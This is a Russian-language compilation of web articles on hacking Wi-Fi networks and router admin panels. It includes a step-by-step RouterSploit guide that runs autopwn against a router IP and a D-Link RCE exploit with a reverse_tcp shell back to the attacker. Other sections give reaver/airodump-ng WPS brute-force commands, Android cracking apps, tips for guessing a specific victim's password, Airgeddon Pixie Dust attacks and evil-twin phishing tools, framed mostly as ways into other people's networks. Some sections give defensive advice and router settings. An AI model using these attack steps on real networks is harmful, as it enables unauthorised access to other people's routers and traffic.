Взлом админ панели Wi-Fi роутера | Канал о интернет безопасности
Все действия мы будем производить с помощью Termux. Для взлома роутеров есть подобная программа — «RouterSploit». Она также, как и Metasploit, позволяет эксплуатировать уязвимости, но только у Wi-Fi роутеров.
Ссылка на термукс: https://play.google.com/store/apps/details?id=com.termux
Внимание!Внимание!
Подпишитесь пожалуйста
Прежде чем устанавливать и запускать RouterSploit нужно прописать следующие команды:
apt update & upgrade
apt install git
apt install bash
apt install python
pip install futureapt
apt install git figletgit
git clone https://github.com/41Team/RoutersploitTermux
Переходим в папку RoutersploitTermux командой:
cd RoutersploitTermux
Запускаем процесс установки:
bash run.sh
По окончанию, появится такое сообщение:
Процесс установки занимает довольно продолжительное время, примерно 20-30 минут.
Давайте же запустим наш RouterSploit и протестируем его:
ls
cd routersploit
python rsf.py
После запуска появится следующее:
Данная программа содержит множество эксплойтов для разных моделей роутеров: D-Link, TP-Link, Huawei, Cisco и т.д. Список всех содержащихся эксплойтов можно посмотреть, прописав команду:
show all
Чтобы проверить, можно ли с помощью какого-либо из имеющихся эксплойтов взломать роутер, пишем:
use scanners/autopwn
set target <ip роутера>, например set target 192.168.1.1
exploit
Если же роутер содержит ту или иную уязвимость, Вы увидите следующее:
Чтобы применить эксплойт прописываем:
use exploits/router/dlink/dsl_2750b_rce
set target <ip роутера>
check
run
set payload reverse_tcp
set lhost <Ваш IP>
run
После этого появится сообщение, Взлом прошел успешно.
Конец! Подписывайтесь)
Как взломать Вай-Фай – способы для компьютера и телефона (2019)
Взломать Вай-Фай – задача непростая, но выполнимая. Сегодня мы разберем несколько способов воплощения в жизнь столь коварного плана.
Помните: Эту статью могут читать и те, чей Вай-Фай вы будете ломать. Они могут таким же образом хакнуть ваш роутер. Более того, это могут сделать другие люди.Поэтому помимо способов взлома мы разберем также то, что вам нужно сделать, чтобы вас никто не взломал.
Да и вообще, эта статья будет носить чисто осведомительный, информационный характер.
Мы не будем рассказывать всех нюансов процесса взлома. Зато поговорим о том, как защититься от него. Поехали!
Содержание:
Способ для компьютера – BackTrack 5 Live CD
Сажем сразу, что взлом Wi-Fi возможен не с операционной системы Windows. Для этого вам понадобится UNIX или Linux.
Но есть и универсальное средство – BackTrack 5 Live CD. Это специальный набор утилит для разработчиков и тестировщиков систем безопасности.
Помимо всего прочего, в него входит программа, которая позволяет увидеть пароль определенной точки доступа.
Также сразу скажем, что данному набору утилит требуется порядка 10 часов для работы. Вы должны учитывать это!
Процесс использования BackTrack 5 Live CD пошагово выглядит следующим образом:
- Сначала вам нужно скачать BackTrack 5 Live CD. Сделать это можно, к примеру, здесь или здесь (по последней ссылке доступны торрент-файлы).
- После этого необходимо создать загрузочную флешку или загрузочный диск (DVD). Сделать это можно, например, при помощи Rufus (подробную инструкцию найдете здесь), WinSetupFromUSB, UltraISO, Universal USB Installer или Unetbootin (инструкция по этим программам тут).
- После создания загрузочного носителя потребуется загрузиться с него . Как это сделать, описано в данной статье (раздел 3). Если сказать коротко, потребуется выбрать загрузку с флешки или диска в BIOS или UEFI.
- Когда BackTrack 5 Live CD загрузится, вы увидите терминал. Сначала в него нужно ввести команду «iwconfig». После ввода жмите кнопку «Enter» на клавиатуре. Вообще, вы должны понять, что здесь все выполняется так же, как в командной строке или в терминале Linux. Первая команда даст программе понять, с чем мы будем работать.
- Дальше следует перевести сетевую карту в режим монитора. То есть она станет таким себе исследователем и сможет видеть конфигурацию доступного для подключения оборудования. Для этого предназначена команда «airmon-ng start [название карты]». В большинстве случаев ваша карта будет называться «wlan0». Это верно в том случае, когда у вас всего лишь одна сетевая карта. Тогда команда будет выглядеть так: «airmon-ng start wlan0».
Рис. 1. Ввод команды для перевода карты в режим монитора
- В левом нижнем углу будет указано имя интерфейса режима монитора. В нашем случае он называется «mon0». Пока что просто запомните его.
- Дальше потребуется узнать BSSID, то есть зашифрованный пароль роутера того, чью сеть мы будем ломать. Для этого предназначены две команды (если одна не помогает, используйте другую): «airodump-ng [имя карты]» (в нашем случае, как вы помните, имя карты «wlan0») и «airodump-ng mon».
- В появившемся списке вы увидите имена и BSSID всех доступных сетей. Выберете нужную. Вы можете понять это по количеству доступных каналов, типу шифрования и другим характеристикам. Главной из них является «PWR». Это power, то есть сила. Она отражает то, насколько близко к вам расположен источник сигнала. Все просто – чем он ближе, тем сильнее. В общем, запомните BSSID нужного роутера.
Рис. 2. Ввод команды на просмотр BSSID
- Дальше введите команду «reaver -i [имя интерфейса режима монитора] -b [нужный BSSID] -vv». Как вы помните, в нашем случае имя интерфейса режима монитора «mon0». Для примера мы возьмем самый сильный роутер с силой 98 (он самый нижний в вписке на рисунке 2). В таком случае команда будет выглядеть так: ««reaver -i mon0 -b 00:1F:C6:83:90:45 -vv».
- А дальше самое интересное. Вы можете идти и заниматься своими делами. Программа может работать до 10 часов! Зато в конце вы увидите PIN, он же пароль. Также пароль может находиться в строке «WPA PSK» (или другое, если используется иной тип шифрования).
Рис. 3. Результат работы BackTrack 5 Live CD
Как видите, ничего сложного в использовании данного набора утилит нет. Да, работает он долго, но эффективно.
Не забудьте в конце поставить в своем БИОС загрузку с жесткого диска, а не с флешки или DVD.
Это важно, так как в противном случае система будет работать неправильно.
Дальше мы сосредоточим свое внимание на приложениях для смартфона или планшета.
Для компьютера другие способы выполнения поставленной задачи, возможно, есть, но все, что вы найдете в интернете, окажется вирусом или просто неработающим способом. BackTrack 5 Live CD действительно работает.
Но через мобильное устройство ломать Вай-Фай намного проще и быстрее, поэтому лучше используйте его.
к содержанию ↑Способ для телефона – WIBR
Как вы поняли, утилита из BackTrack 5 Live CD подбирает пароль тупым брутфорсом, то есть перебором всех возможных вариантов.
Поэтому она и работает настолько долго. Программа WIBR для мобильных устройств действует по тому же принципу.
В большинстве случаев она будет работать быстрее, чем BackTrack 5 потому что сейчас смартфоны мощнее большинства компьютеров.
У них больше оперативной памяти. Все упирается именно в это.
Бывают случаи, когда лучше все-таки воспользоваться компьютером. В общем, смотрите по объему ОЗУ.
А чтобы воспользоваться WIBR, сделайте вот что:
- Скачайте приложение. Сделать это можно и нужно здесь (это официальный сайт). Там нужно нажать кнопку «Download». Установите программу на свое устройство.
- После этого нажмите кнопку «Добавить сеть» в главном меню. Выберете ее из списка доступных подключений.
Рис. 4. Кнопка добавления сети в WIBR
- Вы увидите, как начинается подбор пароля. На экране будет указано, сколько вариантов уже было введено, какой из них пробуется сейчас и сколько еще осталось (это число постоянно меняется, так что ориентироваться на него не стоит). Чтобы прекратить процесс, нажмите кнопку «Пауза». Потом можно будет продолжить.
Рис. 5. Процесс подбора в WIBR
- Если удастся подключиться, то есть ключ будет выбран удачно, появится сообщение «Тест ПРОЙДЕН». Обратите внимание на строку «Текущий пароль». Это и будет ключ, который вам нужен для подключения.
Рис. 6. Результат процесса WIBR
В общем, чтобы воспользоваться WIBR, вам необходимо просто установить программу, выбрать точку доступа и ждать.
Вполне возможно, на весь процесс тоже понадобится 10 часов или больше. Нельзя исключать такой вариант.
Поэтому WIBR, как и другими программами, лучше пользоваться на мощных смартфонах и планшетах. Такие есть у Xiaomi и других китайских фирм.
Некоторые гики даже решают купить отдельный мощный телефон на AliExpress по невысокой цене, чтобы ломать пароли или выполнять другие «тяжелые» задачи.
Но это, разумеется, необязательно.
Переходим к следующему способу.
к содержанию ↑WiHack Mobile
Еще одна программа, которая работает по тому же принципу, что и две предыдущих.
Ее использование выглядит следующим образом:
- Скачайте приложение на этом сайте (опять же, качать нужно именно здесь, ведь на других сайтах лишь пустышки). Установите ее на смартфон – скопируйте в память и запустите файл .apk при помощи кабеля USB (перебросите через мессенджер или воспользуйтесь любым другим способом).
- Выберете точку доступа, которую будете ломать в списке доступных. Внизу выберете вариант «подобрать пароль к сети».
Рис. 7. Первичная настройка WiHack Mobile
- Устройтесь поудобнее, наденьте любимые тапочки, включите сериал и ждите, пока произойдет чудо.
Стоит отметить, что WiHack Mobile работает исключительно с сетями, где используется тип шифрования WPA2, WEP и WPA.
Поэтому обязательно проверьте, какой тип применяется в той точке доступа, которую вы хотите хакнуть.
Вполне возможно, что программа просто откажется работать с тем Вай-Фай, который зашифрован по-другому.
Еще может возникнуть ситуация, когда подбор пароля никогда не закончится.
Вы будете ждать сутками, а результата не будет.
Что касается того, как узнать тип шифрования, то обычно такая информация указывается при подключении в Андроид.
к содержанию ↑WPS Connect
Как вы уже понимаете, данное приложение работает с сетями, где используется тип шифрования WPS. Оно достаточно популярное в Google Play.
Кстати, действительно здорово, что оно там есть.
Это означает, что WPS Connect не нужно качать с каких-то посторонних ресурсов и бояться подхватить вирус.
Его использование выглядит так:
- Скачайте и установите приложение с google.com. Запустите его.
- Сначала нажмите кнопку «Обновить». Она находится в правом верхнем углу окна WPS Connect. С самого начала она отвечает аз функцию поиска доступных сетей.
- После этого нажмите на найденную сеть.
Рис. 8. Окно WPS Connect
- На данном этапе может возникнуть трудность, связанная с тем, что вашему аппарату не присвоены рут права, они же права суперпользователя. Если это действительно так, воспользуйтесь данной инструкцией. В любом случае, вам тоже придется ждать, потому что WPS Connect не выделяется ничем среди общей массы и тоже работает по принципу перебора всех возможных вариантов.
- Когда ключ будет найден, нажмите «Show password» в меню снизу.
Рис. 9. Кнопка «Show password» в WPS Connect
Кстати, что касается рут прав, то такая же проблема, как описано выше, может возникать на абсолютно всех устройствах и с любыми узкопрофильными программами.
Если в вашем случае это так, используйте вышеуказанную инструкцию и будет вам счастье!
к содержанию ↑WIFI WPS WPA TESTER
Довольно интересная программа, которая сработает далеко не во всех случаях.
Когда вы ее откроете, то увидите, что некоторые точки доступа имеют зеленый квадратик, а другие – желтый.
Так вот, точки доступа с зеленой отметкой – это те, которые поддаются взлому.
Остальные, к сожалению, хакнуть не получится.
По какому принципу WIFI WPS WPA TESTER определяет то, что он может поломать, неизвестно. Но попробовать можно.
В общем, процесс использования в данном случае такой:
- Скачайте (в данном случае тоже на google.com) и установите приложение на свое устройство Android. Запустите его.
- После запуска вы увидите тот самое окно со списком доступных подключений, где есть зеленые и желтые квадратики. Помните, что вы можете выбрать только тот, где есть квадрат зеленого цвета. Нажмите на него.
Рис. 10. Список доступных подключений в WIFI WPS WPA TESTER
- Наблюдайте за тем, как программа будет подбирать пароли. В конце вы увидите сообщение (примерно такое, как показано на рисунке 12), где будет указан нужный ключ возле надписи «Password=».
Рис. 11. Окно с подобранным ключом доступа
Обычно WIFI WPS WPA TESTER работает достаточно быстро.
Итак, у вас есть список программ, которые могли бы помочь взломать Вай-Фай.
Пользуйтесь одной из них. Лучше берите приложения для смартфона или планшета.
Вот еще несколько более простых способов взлома пароля:
- Перебор наиболее простых вариантов. Сюда относим «12345678», «qwerty» и тому подобные вещи. Чаще всего люди просто не хотят заморачиваться по поводу подбора надежного ключа и выбирают один из простых вариантов.
- Перебор вариантов в зависимости от пользователя. Если вы хорошо знаете человека, то можете попытаться найти ключ, который он мог бы ввести. К примеру, это может быть имя и год рождения – что-то вроде «vasya1975», имя домашнего питомца (например, «kotpetka») и так далее. Еще это может быть название любимой футбольной команды, родной город и еще много чего.
- Комбинация первых двух вариантов. Например, человек может указывать имя своей собаки и год своего рождения, то есть «markiz1983».
Нередко начинающим хакерам удается подобрать такой ключ достаточно быстро.
Итак, мы разобрали способы взлома. Но что делать если вы – не хакер, а жертва? Разберемся.
к содержанию ↑Действия в случае взлома
Как вообще вы можете понять, что ваш Wi-Fi кто-то ломанул? Ответ простой – им пользуется кто-то еще.
Это, в свою очередь, тоже можно понять достаточно просто – интернет будет нещадно тормозить.
Такое явление является очевидным, так как нагрузка на сеть растет и для всех пользователей скорость соединения становится ниже.
Страницы будут очень медленно грузиться. Кроме того, на самом роутере будет постоянно мигать индикатор Вай-Фай.
Это и означает, что кто-то к нему подключен. Отключите свои устройства и посмотрите, так ли это.
Если это так, вам нужно выполнить такие действия:
- Сразу же смените пароль. При этом постарайтесь выбрать длинный и сложный ключ доступа, который будет включать в себя различные символы и буквы с цифрами. Он не должен касаться вас лично, вашей футбольной команды, домашнего питомца и так далее. В идеале это должен быть набор случайных символов.
Примечание: Пароль должен быть длинным, потому что даже если кто-то будет использовать против вас одну из вышеперечисленных программ, то длинный пароль будет подбираться слишком долго. Пусть он будет состоять из 10, 20 символов и так далее.
- По возможности установите версию шифрования WPA2-PSK (WPA2 Personal Key) и тип AES. Это довольно распространенная, но и работоспособная комбинация. Как это сделать? В настройках роутера, где вы указываете пароль, есть и два вышеперечисленных поля. К примеру, в роутерах TP-Link это выглядит так, как показано на рисунке ниже.
Рис. 12. Настройки роутера TP-Link
- В некоторых случаях лучше даже будет сделать вашу сеть скрытой. Отличие в том, что ее не будет видно ни в одном списке доступных подключений. Соответственно, подключиться к ней, не зная имени и пароля будет невозможно. Для этого в настройках роутера ищите пункт «Enable SSID Broadcast» или «Enable Hidden Wireless».
Чтобы такого не случилось, нужно всегда устанавливать надежный пароль.
Как говорилось выше, чем он будет сложнее и длиннее, тем дольше программа будет его подбирать, если вообще подберет.
Как вы поняли, все утилиты и приложения работают по принципу тупого подбора всех возможных вариантов.
Еще один совет: Время от времени меняйте ключ. Это окончательно запутает возможных злоумышленников.
Как узнать или изменить пароль беспроводной сети на устройствах TP-Link
Эта статья подходит для:
TL-WR841N , TL-WDR3500 , Archer C50( V1 ) , TD-W8961ND , TL-MR3420 , TL-WA801ND , TL-WDR4300 , TD-W8961NB , TD-W8920G , TD-W8951ND , TL-WR541G , TL-WR702N , TD-W8950ND , TD-W8968 , TD-W9980 , TL-WA7210N , TL-WR1043ND , TL-WR1042ND , Archer D5 , TD-VG3511 , TL-WDR3600 , TL-WR842N , Archer C20( V1 ) , TL-WR940N , TD-W8950N , TD-W8901GB , TD-W8960N , TL-WA701ND , TL-WR841ND , TL-WR843ND , TL-WA500G , TL-WR842ND , TL-MR3020 , TD-W8151N , TL-MR3220 , TL-WA601G , TL-WR743ND , TL-WR543G , TL-WR2543ND , TL-WDR4900 , TL-WR941ND , TL-WR843N , TL-WR710N , TD-W8961N , TL-WR802N , TL-WA501G , TL-WR700N , TL-WR841HP , TL-WR340G , TD-W8980 , TL-WA901ND , TL-WR542G , Archer C7( V1 V2 V3 ) , Archer C20i , TL-WR741ND , TD-W8101G , TL-WA5110G , TL-WR740N , TL-WR840N , TL-WR810N , TL-WR340GD , TL-WR720N , TD-W9970 , TD-W8980B , TD-W8901G , TD-VG3631 , Archer C5( V1.20 ) , TL-WA7510N , TD-W8970B , Archer C2( V1 ) , TD-W8970 , TL-MR3040
Имя беспроводной сети и пароль по умолчанию указаны на обратной стороне роутера:
Если данные по умолчанию не подходят, то выполните следующие шаги:
Шаг 1: Подключение
Роутер должен быть подключен через кабель Ethernet к вашему компьютеру как это показано на рисунке ниже:
Либо вы можете воспользоваться устройством, которое подключено к данному роутеру по беспроводной сети.
Шаг 2: Вход в настройки
В данной инструкции рассматривается настройка роутера на примере нескольких интерфейсов.
Перед настройкой необходимо предварительно войти в интерфейс.
Ниже приведены примеры где можно найти пароль wi—fi сети для роутеров с разным меню настроек.
Зелёный интерфейс на примере TL-WR740N
Шаг 1: Просмотр/изменение пароля беспроводной сети
Найдите в меню слева раздел Беспроводной режим (Wireless) и выберите категорию Защита беспроводного режима (Wireless Security).
Пароль сети находится в этом меню (см Скриншот).
Не забудьте сохранить настройки после изменений.
Важно! Пароль должен быть не менее 8 знаков (английские буквы/цифры)
Дополнительно:
При необходимости вы можете изменить имя wi-fi сети роутера.
Для этого перейдите в Беспроводной режим (Wireless) и выберите категорию Настройки беспроводного режима (Wireless Settings).
Имя сети можно поменять в этом разделе (см Скриншот).
Сохраните настройки, нажав кнопку Сохранить (Save)
Шаг 2: Перезагрузка
Если вы изменили пароль, выполните перезагрузку маршрутизатора или точки доступа.
Перезагрузите устройство Системные инструменты (System Tools) – Перезагрузка (Reboot).
Голубой интерфейс на примере TL-WR841N
Шаг 1: Просмотр/изменение пароля беспроводной сети
В открывшейся веб-странице перейдите в раздел Беспроводной режим (Wireless) – Защита беспроводного режима (Wireless Security).
В поле Пароль (Password) вы найдете текущий пароль.
Также вы можете изменить его, для этого потребуется удалить текущий пароль, затем указать новый.
Важно! Пароль должен быть не менее 8 знаков (английские буквы/цифры)
Сохраните настройки, нажав кнопку Сохранить (Save)
Дополнительно:
При необходимости вы можете изменить имя wi-fi сети роутера.
Для этого перейдите в Беспроводной режим (Wireless) и выберите категорию Настройки беспроводного режима (Wireless Settings).
Имя сети можно поменять в этом разделе (см Скриншот).
Шаг 2: Перезагрузка
Если вы изменили пароль, выполните перезагрузку маршрутизатора или точки доступа.
Перезагрузите устройство Системные инструменты (System Tools) – Перезагрузить (Reboot).
Голубой интерфейс на примере Archer C59 (V1)
Шаг 1: Просмотр/изменение пароля беспроводной сети
В открывшейся веб-странице перейдите в раздел Дополнительные настройки (Advanced) Беспроводной режим (Wireless) – Настройки беспроводного режима (Wireless Settings).
В поле Пароль (Password) вы найдете текущий пароль.
Также вы можете изменить его, для этого потребуется удалить текущий пароль, затем указать новый.
Важно! Пароль должен быть не менее 8 знаков (английские буквы/цифры)
При необходимости вы можете изменить имя wi-fi сети роутера.
Имя сети можно поменять в этом разделе (см Скриншот).
Сохраните настройки, нажав кнопку Сохранить (Save)
Перезагрузите роутер кнопкой Перезагрузка в правом верхнем углу меню, чтобы изменения вступили в силу.
Бирюзовый интерфейс на примере Archer C6
Шаг 1: Просмотр/изменение пароля беспроводной сети
В открывшейся веб-странице перейдите в раздел Дополнительные настройки (Advanced) Беспроводной режим (Wireless) – Настройки беспроводного режима (Wireless Settings).
В поле Пароль (Password) вы найдете текущий пароль.
Также вы можете изменить его, для этого потребуется удалить текущий пароль, затем указать новый.
Важно! Пароль должен быть не менее 8 знаков (английские буквы/цифры)
При необходимости вы можете изменить имя wi-fi сети роутера.
Имя сети можно поменять в этом разделе (см Скриншот).
Сохраните настройки, нажав кнопку Сохранить (Save)
Перезагрузите роутер кнопкой Перезагрузка в правом верхнем углу меню, чтобы изменения вступили в силу.
Бирюзовый интерфейс на примере Archer C54
Шаг 1: Просмотр/изменение пароля беспроводной сети
В открывшейся веб-странице перейдите в раздел Дополнительные настройки (Advanced) Беспроводной режим (Wireless) – Настройки беспроводного режима (Wireless Settings).
В поле Пароль (Password) вы найдете текущий пароль.
Также вы можете изменить его, для этого потребуется удалить текущий пароль, затем указать новый.
Важно! Пароль должен быть не менее 8 знаков (английские буквы/цифры)
При необходимости вы можете изменить имя wi-fi сети роутера.
Имя сети можно поменять в этом же разделе (см Скриншот).
Сохраните настройки, нажав кнопку Сохранить (Save)
Перезагрузите роутер кнопкой Перезагрузка в правом верхнем углу меню, чтобы изменения вступили в силу.
Шаг 2: Перезагрузка
Если вы изменили пароль, выполните перезагрузку маршрутизатора или точки доступа.
Перезагрузите устройство зайдя в меню: Дополнительные настройки (Advanced) Системные инструменты (System Tools) – Перезагрузка (Reboot).
Чтобы получить подробную информацию о каждой функции и настройке оборудования, перейдите на страницу Загрузки для загрузки руководства пользователя к Вашей модели устройства.
атаки с Kali Linux, Windows и Android
Вариантов взлома Wi-Fi много, а вот рабочих куда меньше, особенно с современными способами защиты. Но даже так остаются лазейки. В статье рассмотрены распространённые инструменты и методы взлома, которые дадут понять, сколь важно озаботиться защитой беспроводного соединения.
- Cпособы взлома
- Kali Linux для взлома беспроводной сети
- Программы для взлома на Kali Linux
- Взлом с Windows
- Взлом с телефона
- Защита беспроводной сети
Основные способы взлома
- Брутфорс пароля — классический метод, который предполагает перебор всевозможных комбинаций с использованием специальных программ.
- Взлом WPS (Wi-Fi Protected Setup) по вероятным пинам. Роутеров с включённым WPS становится всё меньше, но ещё встречаются. Это вариант с подбором пароля из 8 цифр, а в некоторых случаях и быстрый взлом стандартных заводских PIN-кодов, которые уже есть в базах приложений.
- Беспроводные адаптеры с поддержкой современных протоколов. Подойдёт адаптер Alfa со внешними антеннами. Список актуальных беспроводных адаптеров можно посмотреть здесь.
- Базы паролей для взлома пароля Wi-Fi в общественных местах. Есть смысл использовать только в крупных городах.
- Фишинг — старый-добрый метод вывода у пользователя своей страницы, в которую жертва сама вписывает данные для входа. Это можно реализовать самостоятельно либо с помощью приложения для взлома Wi-Fi Wifiphisher.
- Взлом роутера. Сработает, если вы можете подключиться к Wi-Fi по проводу или знаете внешний IP-адрес. В этом случае можно попытаться подобрать логин и пароль к роутеру. Часто они остаются заводскими по типу admin/admin. Пароль же от Wi-Fi будет лежать в настройках.
Kali Linux и взлом Wi-Fi
Kali по-прежнему остаётся лучшим дистрибутивом для реализации хакерских атак. Он вмещает более 300 предустановленных утилит, необходимых для тестирования безопасности. Не секрет, что в разных утилитах некоторые функции дублируются: в этом случае выбирайте то, с чем удобнее работать. Также вы всегда можете устанавливать дополнительные бесплатные программы для взлома Wi-Fi.
Даже если вы фанат Windows, но попробовать Kali в деле всё-таки хочется, установите дистрибутив на VirtualBox. Подробнее о Kali Linux на виртуальной машине:
Теперь займёмся настройкой. Для получения root-прав пропишите в командной строке:
sudo passwd
И задайте пароль root-пользователя. Затем перезагрузитесь и зайдите под логином и паролем, где логин — root. Теперь вам не придётся к каждой команде приписывать sudo
, так как вы объявили себя суперпользователем.
Следующим шагом обновите операционную систему:
apt update && apt upgrade -y
Теперь установим систему контроля версий Git:
apt install git -y
Если следующие вспомогательные программы не предустановлены, советуем установить:
- Atom — текстовый редактор для работы с кодом.
- Double Commander — линуксовский аналог Total Commander с открытым исходным кодом. Максимально понятен и с большим количеством полезных функций.
- Filezilla — бесплатный многоязычный FTP-клиент. Поддерживает FTP, SFTP, и FTPS. Может похвастаться настраиваемым интерфейсом. Если планируете работать с FTP, это приложение для вас.
- Network Manager OpenVPN — понадобится для настройки VPN. Да, всегда можно использовать консольную версию OpenVPN, однако графический интерфейс гораздо удобнее. И тут на помощь приходит Network Manager.
- Tor Browser. Изначально Tor предустановлен в Kali, но лучше скачать с официального сайта. Версия Kali Tor не поддерживается, а значит и не обновляется, так что можно пропустить улучшенную версию. Добавьте репозитории Tor Project в список APT, загрузите ключ подписи пакета и импортируйте в APT-ключ.
Программы для взлома Wi-Fi на Kali Linux
Airgeddon
Его называют инструментом для ленивых, потому что Airgeddon не требует специальных технических навыков и позволяет автоматизировать работу со множеством программ для атаки на Wi-Fi.
Команда Tproger решила протестировать данный инструмент на собственной Wi-Fi сети.
Важно Убедитесь, что Kali Linux подключён к беспроводной сети.
Установите скрипт следующей командой:
git clone https://github.com/v1s1t0r1sh4r3/airgeddon
В ряде атак на беспроводные сети нам потребуются словари. Можно воспользоваться и тем, который есть в Kali Linux, усовершенствовав его под наши нужды. Для этого выполним несколько команд:
cp /usr/share/wordlists/rockyou.txt.gz ~/
gunzip ~/rockyou.txt.gz
cat ~/rockyou.txt | sort | uniq | pw-inspector -m 8 -M 63 > ~/newrockyou.txt
rm ~/rockyou.txt
Теперь переходим в папку со скриптом:
cd airgeddon/
Запускаем Airgeddon:
bash airgeddon.sh
Установите все недостающие зависимости. Если вы всё сделали верно, перед вами появится окно со следующими статусами:
Далее выберите беспроводной интерфейс. По умолчанию это wlan0:
Теперь пункт «2. Перевести интерфейс в режим монитора»:
Попробуем произвести наш первый взлом Wi-Fi.
Внимание! Автор статьи испытывал программу на своей беспроводной сети. Помните, что данный материал предназначен для ознакомления с распространёнными способами взлома и своевременного устранения уязвимостей.
Автоматизированные атаки на WPS
Ранее мы писали, что роутеры с включённым WPS ещё встречаются. Для взлома нужно перебрать различные комбинации, состоящие из восьми цифр. Поэтому следует начать с проверки сетей.
Выбираем пункт «8. Меню атак на WPS». Airgeddon предлагает четыре вида атак на WPS:
- Взлом по известному PIN
- Pixie Dust
- Полный перебор PIN
- Атака по базе данных известных PIN
Выбрать можно любой из вариантов. Первым рекомендуется использовать Pixie Dust Attack. Принцип атаки основан на том, что ряд точек доступа используют низкую или несуществующую энтропию. Для получения PIN этим способом потребуется от нескольких миллисекунд до минут, но только в том случае, если цель уязвима.
Давайте проверим на уязвимость нашу сеть. Выбираем пункт «4. Поиск целей»:
Из данного скрина можно сделать вывод, что все найденные роутеры с включёнными WPS: эти сети уязвимы к хакерским атакам, в том числе и наша.
Выбираем нашу сеть и пункт «8. Атака Pixie Dust» (если просит снова перевести интерфейс в режим монитора, делаем это, выбирая пункт 2). Установите таймаут в 300 или более секунд, выберите папку, в которой будет сохранён текстовый документ с паролем, и запустите скрипт.
Процесс взлома выглядит так:
Будем откровенны, данный способ не взломал нашу беспроводную сеть, однако подсказал, что следует обезопасить себя от подобных вмешательств и отключить WPS.
Если атака Pixie Dust не удалась, следующий рекомендуемый способ — атака на основе базы данных известных пинов. Если и там нас ждёт неудача, воспользоваться полным перебором. Последний способ может занять часы а то и дни.
Сама же брутфорс-атака выглядит следующим образом:
Итак, мы подробно рассмотрели на примере Airgeddon, как можно взломать WiFi. Теперь же вскользь пробежимся по более сложным инструментам, которые используют хакеры.
Fern Wi-Fi Wireless Cracker
Fern Wi-Fi Wireless Cracker — бесплатная программа не столько для взлома Wi-Fi, сколько для аудита беспроводных сетей. Утилита написана на языке программирования Python, а GUI создан с помощью кроссплатформенного фреймворка QT.
Функционал Fern Wi-Fi Wireless Cracker включает в себя:
- перехват трафика и cookie-файлов;
- взлом паролей Wi-Fi;
- вычисление MAC-адреса и расположения устройства;
- атаки на беспроводные сети WEP и WAP с использованием словаря;
- расшифровку протоколов маршрутизатора.
Для работы необходимо подключиться к беспроводной сети и выбрать способ взлома.
WepDecrypt
Бесплатное приложение для взлома сетей, защищённых протоколом WEP. Само приложение написано на языке программирования C. В нём предусмотрено несколько способов взлома ключей, начиная перебором вариантов по готовому словарю и заканчивая сложными аналитическими алгоритмами.
Перед началом работы убедитесь, что установлены все необходимые системные библиотеки.
Wifiphisher
Как мы уже говорили, эта программа создаёт фальшивую точку доступа и предоставляет её пользователю вместо оригинальной. Далее приложение просит пользователя авторизоваться, а введённые им данные передаёт злоумышленнику.
Чтобы Wifiphisher работал нормально, потребуется Kali Linux и два беспроводных адаптера. Хотя сейчас можно найти Wifiphisher и для взлома Wi-Fi на Windows.
Преимущества:
- уникальные технологии взлома;
- работа с сайтами;
- возможность выбрать шаблон;
- скорость работы.
Infernal Twin
Как и Wifiphisher, Infernal Twin создаёт фальшивую точку доступаWi-Fi. Принцип тот же: пользователь подключается к фейковой сети и вписывает в поля свои реальные данные.
Программа используется для кражи паролей, фишинга, перехвата трафика, etc.
Взлом Wi-Fi на Windows
Не самая популярная операционная система для взлома, но всё же некоторые хорошие программы есть и под Винду.
Aircrack-ng
Программа предоставляет следующие возможности:
- перехват пакетов в беспроводной сети;
- их анализ;
- расшифровка.
Подходит для подключения к WiFi с защитой в виде WEP или WPA шифрования. По сути это не одна программа, а пакет утилит для мониторинга беспроводных сетей.
CommView for WiFi
Принцип примерно такой же. Приложение мониторит и анализирует сетевые пакеты, которые передаются в сетях стандартов 802.11 a/b/g/n/ac/ax. После захвата пакетов CommView for WiFi отображает список точек доступа, узлов, уровни сигнала и другую полезную информацию.
В CommView for WiFi входит и модуль VoIP, который работает с голосовыми сообщениями SIP и H.323. Наблюдение за звонками VoIP позволяет обнаружить и своевременно устранить возможные проблемы связи на сетевом и протокольном уровнях.
Взлом с телефона
Перечисленные способы были ориентированы на ПК. Теперь поговорим об Android-смартфонах.
Для Android также предусмотрены хакерские программы, которые позволяют подключаться к удалённым серверам по SSH, менять MAC-адрес устройства, тестировать беспроводную сеть на возможные уязвимости и многое другое.
Минус смартфона в том, что его мощности может не хватить для грубого перебора или других операций. Но есть хакерские Android-приложения, которые позволяют выполнить ряд действий по взлому беспроводной сети.
Защита беспроводной сети
В статье мы рассмотрели популярные способы и программы для взлома Wi Fi. С их помощью вы сможете проверить безопасность своей сети, как мы это сделали на примере Airgeddon, и предпринять меры по устранению уязвимостей. Будьте осторожны в использовании данных инструментов и применяйте их исключительно в законных целях.
Знаете другие популярные программы для атак на беспроводные сети? Напишите в комментариях.
Узнайте также, как обезопасить себя от взлома почты с использованием одноразового email.
3Взлом WiFi на Андроид. Взлом WiFi с мобильного устройства
Практика показывает, что большинство взломов совершается самыми примитивными методами. Автор лишь рассуждает о технических возможностях взлома и не призывает вас так действовать. Есть только один способ научиться эффективно отражать сетевые атаки — это знать как их выполняют другие и ставить себя на место атакующего. Иначе любой аудит превращается в фиктивную проверку на соответствие стандартам.
Еще по теме: Рабочие методы взлома WiFi
Данный материал носит информационный характер. Он адресован специалистам по информационной безопасности и тем, кто собирается ими стать.
Взлом WiFi на Андроид
В сегодняшней статье мы поговорим о взломе WiFi. выполним подготовку и разберем простые атаки с использование Андроид устройств, а в следующей перейдем к более серьезным инструментам.
Что нужно для взлома Wi-Fi с мобильного телефона
Все, что потребуется для быстрого старта, — минимально подготовленный смартфон или планшет с ОС Android. Если не стоит задача взломать определенную и хорошо защищенную сеть, а хочется просто подключиться к закрытому вайфаю поблизости, этого будет достаточно.
Первичную разведку эфира можно проводить на устройствах с Android 2.3–4.4, а начиная с Android 5.0 появилась возможность выполнять простейшие WPS PIN атаки даже без рута. Просто ставишь пару приложений и нажимаешь кнопку «сделать как надо». Но самое интересное, как всегда, кроется в деталях.
Устройства для взлома Wi-Fi с мобильного
Если вкратце, то вам понадобится дистрибутив NetHunter, один из совместимых телефонов с поддерживаемой прошивкой и, конечно, внешний USB-адаптер, подключаемый через кабель OTG.
В качестве донгла можете взять уже упомянутый в статье «Адаптеры для вардрайвинга» TP-Link WN722N — из всех популярных только у него энергопотребление достаточно низкое, чтобы можно было подключать даже к маломощным устройствам. Более дорогие и навороченные «Альфы» тоже вполне реально приспособить к телефону, но не все и не к любому.
Мощная «карточка» может не заработать или начать подчистую высасывать аккумулятор телефона. В результате народ уже стал изобретать схемы с внешними батарейками и даже солнечными зарядками.
